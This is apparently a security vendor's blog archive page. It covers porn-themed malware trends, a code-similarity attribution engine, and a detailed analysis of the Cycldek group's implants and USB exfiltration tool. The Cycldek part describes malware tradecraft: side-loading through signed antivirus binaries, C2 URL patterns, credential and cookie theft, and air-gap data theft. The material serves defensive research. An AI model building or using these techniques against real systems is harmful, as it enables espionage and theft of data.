We have seen blog posts where cybercriminals share their experience of creating and distributing various malware, including sextortion ransomware. For instance, one of them described a process for creating and distributing mobile ransomware focused on sextortion. An app would use a frontal camera to take a picture of a user and, accusing one of watching illicit content, would threaten to distribute the user’s photograph along with screenshots of the content they were watching unless the victim pays. Sound familiar? That’s because the method has been around for years, and is unlikely to go away – as long as there are unprotected and vulnerable users, there will always be someone taking advantage.

Conclusions and advice

The overview of porn-related threats allows us to draw a few substantial conclusions. While we have not seen many changes in the techniques used by cybercriminals, statistics show that this topic remains a steady source of threats. Although PC malware distribution has been dropping – a trend that we have seen lately for a variety of threats – mobile malware is on the rise. With users increasingly using mobile devices for more tasks than ever (and that includes different types of entertainment), it is likely that cybercriminals have responded to this trend. While we cannot confirm a correlation, significant changes in the number of users affected both by PC and mobile malware relating to adult content allows us to at least theorize that this is one of the reasons for the change.

Another important conclusion to draw attention to is that of abuse of privacy. While some users have taken their privacy to a new level by anonymously purchasing online accounts, others remain at more risk than ever of compromising their data. Both the leaks we have seen in the media in the past year and the availability of personal or private information on the dark market for minimal sums suggest that the risks to users are increasing. With cybercriminals able to cross-reference various leaked databases of users, they are able to make more informed decisions on who to target and how, making sextortion and scamming more effective. More than ever, users need to take serious steps to protect themselves by applying advanced security measures and educating themselves on handling their data on the web and evaluating what risks exposure entails.

To consume and produce adult content safely, Kaspersky advises the following:

For consumers:

  • Pay attention to the website’s authenticity. Do not visit websites until you are sure they are legitimate and start with ‘https’. Confirm that the website is genuine by double-checking the format of the URL or the spelling of the company name and try looking for reviews of sites that seem suspicious;
  • If you want to buy a paid subscription to an adult content website, only purchase it on the official website. Double-check the URL of the website and make sure it’s authentic;
  • Check any email attachments with a security solution before opening them – especially from dark web entities (even if they are expected to come from an anonymous source);
  • Patch the software on your PC as soon as security updates for the latest bugs are available;
  • Do not download pirated software and other illegal content. Even if you were redirected to the webpage from a legitimate website;
  • Check application permissions on Android devices to see what your installed apps are allowed to do;
  • Do not install applications from untrusted sources, even if they are actively advertised, and block the installation of programs from unknown sources in your smartphone settings;
  • Use a reliable security solution with behavior-based anti-phishing technologies – such as Kaspersky Security Cloud to detect and block spam and phishing attacks. The solution also incorporates the Permission Checker feature for Android that helps users identify potentially dangerous or questionable requests made by the downloaded app, and explain the risks associated with different types of common permissions.

For businesses:

  • Educate employees on the risks of reckless online behavior – both for themselves and for the business. Schedule basic security awareness training for your employees, such as Kaspersky Automated Security Awareness Platform that covers email security and internet security, among other essential practices.
2020. június 9.

Big Threats Using Code Similarity. Part 1

Today, we are announcing the release of KTAE, the Kaspersky Threat Attribution Engine. This code attribution technology, developed initially for internal use by the Kaspersky Global Research and Analysis Team, is now being made available to a wider audience. You can read more about KTAE in our official press release [here], or go directly to its info [page] on the Kaspersky Enterprise site. From an internal tool, to prototype and product, this is a road which took about 3 years. We tell the story of this trip below, while throwing in a few code examples as well. However, before diving into KTAE, it’s important to talk about how it all started, on a sunny day, approximately three years ago.

May 12, 2017, a Friday, started in a very similar fashion to many other Fridays: I woke up, made coffee, showered and drove to work. As I was reading e-mails, one message from a colleague in Spain caught my attention. Its subject said “Crisis … (and more)”. Now, crisis (and more!) is not something that people appreciate on a Friday, and it wasn’t April 1st either. Going through the e-mail from my colleague, it became obvious something was going on in several companies around the world. The e-mail even had an attachment with a photo, which is now world famous:

Soon after that, Spain’s Computer Emergency Response Team CCN-CERT, posted an alert on their site about a massive ransomware attack affecting several Spanish organizations. The alert recommended the installation of updates in the Microsoft March 2017 Security Bulletin as a means of stopping the spread of the attack. Meanwhile, the National Health Service (NHS) in the U.K. also issued an alert and confirmed infections at 16 medical institutions.

As we dug into the attack, we confirmed additional infections in several additional countries, including Russia, Ukraine, and India.

Quite essential in stopping these attacks was the Kaspersky System Watcher component. The System Watcher component has the ability to rollback the changes done by ransomware in the event that a malicious sample manages to bypass other defenses. This is extremely useful in case a ransomware sample slips past defenses and attempts to encrypt the data on the disk.

As we kept analysing the attack, we started learning more things; for instance, the infection relied on a famous exploit, (codenamed “EternalBlue”), that has been made available on the internet through the Shadowbrokers dump on April 14th, 2017 and patched by Microsoft on March 14. Despite the fact the patch has been available for two months, it appeared that many companies didn’t patch. We put together a couple of blogs, updated our technical support pages and made sure all samples were detected and blocked even on systems that were vulnerable to the EternalBlue exploit.

Meanwhile, as everyone was trying to research the samples, we were scouting for any possible links to known criminal or APT groups, trying to determine how a newcomer malware was able to cause such a pandemic in just a few days. The explanation here is simple – for ransomware, it is not very often that we get to see completely new, built from scratch, pandemic-level samples. In most cases, ransomware attacks make use of some popular malware that is sold by criminals on underground forums or, “as a service”.

And yet, we couldn’t spot any links with known ransomware variants. Things became a bit clearer on Monday evening, when Neel Mehta, a researcher at Google, posted a mysterious message on Twitter with the #WannaCryptAttribution hashtag:

The cryptic message in fact referred to a similarity between two samples that have shared code. The two samples Neel refers to in the post were:

  • A WannaCry sample from February 2017 which looks like a very early variant
  • A Lazarus APT group sample from February 2015

The similarity can be observed in the screenshot below, taken between the two samples, with the shared code highlighted:

Although some people doubted the link, we immediately realized that Neel Mehta was right. We put together a blog diving into this similarity, “WannaCry and Lazarus Group – the missing link?”. The discovery of this code overlap was obviously not a random hit. For years, Google integrated the technology they acquired from Zynamics into their analysis tools making it possible to cluster together malware samples based on shared code. Obviously, the technology seemed to work rather nicely. Interestingly, one month later, an article was published suggesting the NSA also reportedly believed in this link.

Thinking about the story, the overlap between WannaCry and Lazarus, we put a plan together – what if we built a technology that can quickly identify code reuse between malware attacks and pinpoint the likely culprits in future cases? The goal would be to make this technology available in a larger fashion to assist threat hunters, SOCs and CERTs speed up incident response or malware triage. The first prototype for this new technology was available internally June 2017, and we continued to work on it, fine-tuning it, over the next months.

In principle, the problem of code similarity is relatively easy. Several approaches have been tested and discussed in the past, including:

  • Calculating checksums for subs and comparing them against a database
  • Reconstructing the code flow and creating a graph from it; comparing graphs for similar structures
  • Extracting n-grams and comparing them against a database
  • Using fuzzy hashes on the whole file or parts of it
  • Using metadata, such as the rich header, exports or other parts of the file; although this isn’t code similarity, it can still yield some very good results

To find the common code between two malware samples, one can, for instance, extract all 8-16 byte strings, then check for overlaps. There’s two main problems to that though:

  • Our malware collection is too big; if we want to do this for all the files we have, we’d need a large computing cluster (read: thousands of machines) and lots of storage (read: Petabytes)
  • Capex too small

Additionally, doing this massive code extraction, profiling and storage, not to mention searching, in an efficient way that we can provide as a stand-alone box, VM or appliance is another level of complexity.

To refine it, we started experimenting with code-based Yara rules. The idea was also simple and beautiful: create a Yara rule from the unique code found in a sample, then use our existing systems to scan the malware collection with that Yara rule.

Here’s one such example, inspired by WannCry:

This innocent looking Yara rule above catches BlueNoroff (malware used in the Bangladesh Bank Heist), ManusCrypt (a more complex malware used by the Lazarus APT, also known as FALLCHILL) and Decafett, a keylogger that we previously couldn’t associate with any known APT.

A breakthrough in terms of identifying shared code came in Sep 2017, when for the first time we were able to associate a new, “unknown” malware with a known entity or set of tools. This happened during the #CCleaner incident, which was initially spotted by Morphisec and Cisco Talos.

In particular, our technology spotted a fragment of code, part of a custom base64 encoding subroutine, in the Cbkrdr shellcode loader that was identical to one seen in a previous malware sample named Missl, allegedly used by APT17:

Digging deeper, we identified at least three malware families that shared this code: Missl, Zoxpng/Gresim and Hikit, as shown below in the Yara hits:

In particular, the hits above are the results of running a custom Yara rule, based on what we call “genotypes” – unique fragments of code, extracted from a malware sample, that do not appear in any clean sample and are specific to that malware family (as opposed to being a known piece of library code, such as zlib for instance).

As a side note, Kris McConkey from PwC delivered a wonderful dive into Axiom’s tools during his talk “Following APT OpSec failures” at SAS 2015 – highly recommended if you’re interested in  learning more about this APT super-group.

https://www.youtube.com/watch?v=NFJqD-LcpIg

Soon, the Kaspersky Threat Attribution Engine – “KTAE” – also nicknamed internally “Yana”, became one of the most important tools in our analysis cycle.

Digging deeper, or more case studies

The United States Cyber Command, or in short, “USCYBERCOM”, began posting samples to VirusTotal in November 2018, an excellent move in our opinion. The only drawback for these uploads was the lack of any context, such as the malware family, if it’s APT or criminal, which group uses them and whether they were found in the wild, or scooped from certain places. Although the first upload, a repurposed Absolute Computrace loader, wasn’t much of an issue to recognize, an upload from May 2019 was a bit more tricky to identify. This was immediately flagged as Sofacy by our technology, in particular, as similar to known XTunnel samples, a backdoor used by the group. Here’s how the KTAE report looks like for the sample in question:

Analysis for d51d485f98810ab1278df4e41b692761

In February 2020, USCYBERCOM posted another batch of samples that we quickly checked with KTAE. The results indicated a pack of different malware families, used by several APT groups, including Lazarus, with their BlueNoroff subgroup, Andariel, HollyCheng, with shared code fragments stretching back to the DarkSeoul attack, Operation Blockbuster and the SPE Hack.

Going further, USCYBERCOM posted another batch of samples in May 2020, for which KTAE revealed a similar pattern.

Of course, one might wonder, what else can KTAE do except help with the identification of VT dumps from USCYBERCOM?

For a more practical check, we looked at the samples from the 2018 SingHealth data breach that, according to Wikipedia, was initiated by unidentified state actors. Although most samples used in the attack are rather custom and do not show any similarity with previous attacks, two of them have rather interesting links:

KTAE analysis for two samples used in the SingHealth data breach

Mofang, a suspected Chinese-speaking threat actor, was described in more detail in 2016 by this FOX-IT research paper, written by Yonathan Klijnsma and his colleagues. Interestingly, the paper also mentioned Singapore as a suspected country where this actor is active. Although the similarity is extremely weak, 4% and 1% respectively, they can easily point the investigator in the right direction for more investigation.

Another interesting case is the discovery and publication (“DEADLYKISS: HIT ONE TO RULE THEM ALL. TELSY DISCOVERED A PROBABLE STILL UNKNOWN AND UNTREATED APT MALWARE AIMED AT COMPROMISING INTERNET SERVICE PROVIDERS“) from our colleagues at Telsy of a new, previously unknown malware deemed “DeadlyKiss”. A quick check with KTAE on the artifact with sha256 c0d70c678fcf073e6b5ad0bce14d8904b56d73595a6dde764f95d043607e639b (md5: 608f3f7f117daf1dc9378c4f56d5946f) reveals a couple of interesting similarities with other Platinum APT samples, both in terms of code and unique strings.

Analysis for 608f3f7f117daf1dc9378c4f56d5946f

Another interesting case presented itself when we were analysing a set of files included in one of the Shadowbrokers dumps.

Analysis for 07cc65907642abdc8972e62c1467e83b

In the case above, “cnli-1.dll” (md5: 07cc65907642abdc8972e62c1467e83b) is flagged as being up to 8% similar to Regin. Looking into the file, we spot this as a DLL, with a number of custom looking exports:

Looking into these exports, for instance, fileWriteEx, shows the library has actually been created to act as a wrapper for popular IO functions, most likely for portability purposes, enabling the code to be compiled for different platforms:

Speaking of multiplatform malware, recently, our colleagues from Leonardo published their awesome analysis of a new set of Turla samples, targeting Linux systems. Originally, we published about those in 2014, when we discovered Turla Penquin, which is one of this group’s backdoors for Linux. One of these samples (sha256: 67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502) was uploaded to VirusTotal in April 2020. A quick check in KTAE for this sample reveals the following:

Analysis for b4587870ecf51e8ef67d98bb83bc4be7 – Turla 64 bit Penquin sample

We can see a very high degree of similarity with two other samples (99% and 99% respectively) as well as other lower similarity hits to other known Turla Penquin samples. Looking at the strings they have in common, we immediately spot a few very good candidates for Yara rules—quite notably, some of them were already included in the Yara rules that Leonardo provided with their paper.

 

When code similarity fails

When looking at an exciting, brand new technology, sometimes it’s easy to overlook any drawbacks and limitations. However, it’s important to understand that code similarity technologies can only point in a certain direction, while it’s still the analyst’s duty to verify and confirm the leads. As one of my friends used to say, “the best malware similarity technology is still not a replacement for your brain” (apologies, dear friend, if the quote is not 100% exact, that was some time ago). This leads us to the case of OlympicDestroyer, a very interesting attack, originally described and named by Cisco Talos.

In their blog, the Cisco Talos researchers also pointed out that OlympicDestroyer used similar techniques to Badrabbit and NotPetya to reset the event log and delete backups. Although the intention and purpose of both implementations of the techniques are similar, there are many differences in the code semantics. It’s definitely not copy-pasted code, and because the command lines were publicly discussed on security blogs, these simple techniques became available to anyone who wants to use them.

In addition, Talos researchers noted that the evtchk.txt filename, which the malware used as a potential false-flag during its operation, was very similar to the filenames (evtdiag.exe, evtsys.exe and evtchk.bat) used by BlueNoroff/Lazarus in the Bangladesh SWIFT cyberheist in 2016.

Soon after the Talos publication, the Israeli company IntezerLabs tweeted that they had found links to Chinese APT groups. As a side node, IntezerLabs have an exceptional code similarity technology themselves that you can check out by visiting their site at analyze.intezer.com.

IntezerLabs further released a blogpost with an analysis of features found using their in-house malware similarity technology.

A few days later, media outlets started publishing articles suggesting potential motives and activities by Russian APT groups: “Crowdstrike Intelligence said that in November and December of 2017 it had observed a credential harvesting operation operating in the international sporting sector. At the time it attributed this operation to Russian hacking group Fancy Bear”…

On the other hand, Crowdstrike’s own VP of Intelligence, Adam Meyers, in an interview with the media, said: “There is no evidence connecting Fancy Bear to the Olympic attack”.

Another company, Recorded Future, decided to not attribute this attack to any actor; however, they claimed that they found similarities to BlueNoroff/Lazarus LimaCharlie malware loaders that are widely believed to be North Korean actors.

During this “attribution hell”, we also used KTAE to check the samples for any possible links to previous known campaigns. And amazingly, KTAE discovered a unique pattern that also linked Olympic Destroyer to Lazarus. A combination of certain code development environment features stored in executable files, known as a Rich header, may be used as a fingerprint identifying the malware authors and their projects in some cases. In the case of the Olympic Destroyer wiper sample analyzed by Kaspersky, this “fingerprint” produced a match with a previously known Lazarus malware sample. Here’s how today’s KTAE reports it:

Analysis for 3c0d740347b0362331c882c2dee96dbf

The 4% similarity shown above comes from the matches in the sample’s Rich header. Initially, we were surprised to find the link, even though it made sense; other companies also spotted the similarities and Lazarus was already known for many destructive attacks. Something seemed odd though. The possibility of North Korean involvement looked way off mark, especially since Kim Jong-un’s own sister attended the opening ceremony in Pyeongchang. According to our forensic findings, the attack was started immediately before the official opening ceremony on 9 February, 2018. As we dug deeper into this case, we concluded it was an elaborate false flag; further research allowed us to associate the attack with the Hades APT group (make sure you also read our analysis: “Olympic destroyer is here to trick the industry“).

This proves that even the best attribution or code similarity technology can be influenced by a sophisticated attacker, and the tools shouldn’t be relied upon blindly. Of course, in 9 out of 10 cases, the hints work very well. As actors become more and more skilled and attribution becomes a sensitive geopolitical topic, we might experience more false flags such as the ones found in the OlympicDestroyer.

If you liked this blog, then you can hear more about KTAE and using it to generate effective Yara rules during the upcoming “GReAT Ideas, powered by SAS” webinar, where, together with my colleague Kurt Baumgartner, we will be discussing practical threat hunting and how KTAE can boost your research. Make sure to register for GReAT Ideas, powered by SAS, by clicking here.

Register: https://www.brighttalk.com/webcast/15591/414427

Note: more information about the APTs discussed here, as well as KTAE, is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

 

2020. június 3.

Cycldek: Bridging the (air) gap

Key findings

While investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:

  • Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.
  • Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.
  • We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.
  • One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.
Background

Cycldek is a long-known Chinese-speaking threat actor. Based on the group’s past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:

  • 2013 – indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly described by CrowdStrike.
  • 2014 – further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.
  • 2017 – the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as described by Fortinet.
  • 2018 – attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky’s Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.

Figure 1: Timeline of Cycldek-attributed attacks.

Most attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as ‘Royal Road’) and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:

  • a legitimate signed application, usually related to an AV product, e.g. QcConsol – McAfee’s QuickClean utility, and wsc_proxy.exe, Avast’s remediation service.
  • a malicious DLL which is side-loaded by the former application.
  • an encrypted binary which gets decrypted and executed by the DLL.

The final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on Github, allowing attackers to leverage and modify it for their needs.

In the case of Cycldek, the first public accounts of the group’s usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.

Two implants, two clusters

When inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.

Our analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster’s implant are summarized in the table below.

BlueCore RedCore Initial Infection Vector RTF documents Unknown Legitimate AV Utility QcConcol.exe (McAfee’s QuickClean utility) wsc_proxy.exe (Avast’s remediation application) Side-Loaded DLL QcLite.dll wsc.dll Payload Loader stdole.tlb – contains PE loading shellcode and an encrypted BlueCore binary msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary Injected Process dllhst3g.exe explorer.exe or winlogon.exe Configuration File %APPDATA%\desktop.ini C:\Documents and Settings\All Users\Documents\desktop.ini or

C:\Documents and Settings\All Users\Documents\desktopWOW64.ini Mutexes UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},

{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},

{E68DFA68-1132-4A32-ADE2-8C87F282C457},

{728264DE-3701-419B-84A4-2AD86B0C43A3},

{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},

{D9AE3AB0-D123-4F38-A9BE-898C8D49A214} Communicated URL Scheme http://%s:%d/link?url=%s&enpl=%s&encd=%s http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s

or

http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s

Table 1: Comparison of BlueCore and RedCore loader and implant traits.

As demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.

Figure 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore.

Moreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files ‘stdole.tlb’ and ‘msgsm64.acm’,  contains a routine used to decrypt the implants’ raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.

Figure 3: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters.

Having said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:

  • Keylogger: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named ‘RCoRes64.dat’. The data is encoded using a single byte XOR with the key 0xFA.
  • Device enumerator: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.
  • RDP logger: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named EventCop which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.
  • Proxy server: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.

Perhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.

Figure 4: Difference in URL scheme used by each implant for C2 communication.

The conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.

Figure 5: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.

Furthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources – both code and infrastructure – and operating under a single organizational umbrella.

Figure 6: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.

Info stealing and lateral movement toolset

During the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools – some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.

As in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.

As already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).

The rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:

  • Custom HDoor: an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the Naikon APT that made use of the original tool.
    The custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.

Figure 7: Command line usage of the custom HDoor tool.

  • JsonCookies: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named ‘FuckCookies.txt’ containing stolen cookie info. Entries in the file resemble this one:
{ "domain": ".google.com", "id": 1, "name": "NID", "path": "/", "value": "%VALUE%" }
  • ChromePass: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.

Figure 8: Command line usage of the ChromePass tool.

Formerly Unreported Malware: USBCulprit

One of the most notable examples in Cycldek’s toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

During the time the malware was active, it showed little change in functionality. Based on Kaspersky’s telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.

Another change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.

This loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named ‘wrapper.exe’ (originally named ‘PtUserSessionWrapper.exe’ and belonging to Trend Micro) forces the execution of a malicious DLL named ‘TmDbgLog.dll’. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.

Figure 9: USBCulprit’s loading flow, as observed in samples after 2017.

Once USBCulprit is loaded to memory and executed, it operates in three phases:

  • Boostrap and data collection: this stage prepares the environment for the malware’s execution. Namely, it invokes two functions named ‘CUSB::RegHideFileExt’ and ‘CUSB::RegHideFile’ that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named ‘CUSB::USBFindFile’. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.

The chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a ‘rar.exe’ command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware’s execution, and is set to ‘abcd!@#$’ for most variants that we observed.

It is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named ‘time’ within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the ‘time’ file doesn’t exist, it is created with the default value ‘20160601000000’ corresponding to 01/06/2016 00:00:00.

  • USB connection interception and data exfiltration/delivery: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.

When a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named ‘$Recyc1e.Bin’ will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.

To understand which direction of file copy should take place, a special marker file named ‘1.txt’ is searched locally. If it exists, the malware would expect to find the aforementioned ‘$Recyc1e.Bin’ directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.

Figure 10: USBCulprit’s check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it.

  • Lateral movement and extension: as part of the same loop mentioned above, the existence of another marker file named ‘2.txt’ will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware’s binary be copied from its local path to the ‘$Recyc1e.Bin’ directory. It’s noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named ‘CUSB::runlist’, while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.

The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.

Figure 11: Commands used to profile the network connectivity of the compromised host.

